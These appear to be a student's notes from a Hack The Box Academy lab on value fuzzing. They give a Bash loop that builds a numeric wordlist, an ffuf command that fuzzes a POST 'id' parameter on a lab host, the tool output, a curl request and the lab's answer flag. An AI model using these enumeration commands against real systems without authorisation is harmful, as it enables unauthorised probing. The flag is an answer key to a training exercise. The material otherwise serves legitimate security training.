There are many ways to create this wordlist, from manually typing the IDs in a file, or scripting it using Bash or Python. The simplest way is to use the following command in Bash that writes all numbers from 1-1000 to a file:

ONE LINER SYNTAX: MJBUCKNER@htb[/htb]$ for i in $(seq 1 1000); do echo $i >> ids.txt; done


Value Fuzzing
Our command should be fairly similar to the POST command we used to fuzz for parameters, but our FUZZ keyword should be put where the parameter value would be, and we will use the ids.txt wordlist we just created, as follows:

SYNTAX: MJBUCKNER@htb[/htb]$ ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx


        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.0.2
________________________________________________

 :: Method           : POST
 :: URL              : http://admin.academy.htb:30794/admin/admin.php
 :: Header           : Content-Type: application/x-www-form-urlencoded
 :: Data             : id=FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
 :: Filter           : Response size: xxx
________________________________________________

<...SNIP...>                      [Status: xxx, Size: xxx, Words: xxx, Lines: xxx]

Question 1 - Try to create the 'ids.txt' wordlist, identify the accepted value with a fuzzing scan, and then use it in a 'POST' request with 'curl' to collect the flag. What is the content of the flag? - HTB{p4r4m373r_fuzz1n6_15_k3y!} 

1) for i in $(seq 1 1000); do echo $i >> ids.txt; done 
2) ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:47483/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs 768 
Output 73                      [Status: 200, Size: 787, Words: 218, Lines: 54, Duration: 77ms]
3) curl -X POST "http://admin.academy.htb:47483/admin/admin.php" \
     -d "id=73" \
     -H "Content-Type: application/x-www-form-urlencoded"

output: HTB{p4r4m373r_fuzz1n6_15_k3y!} 
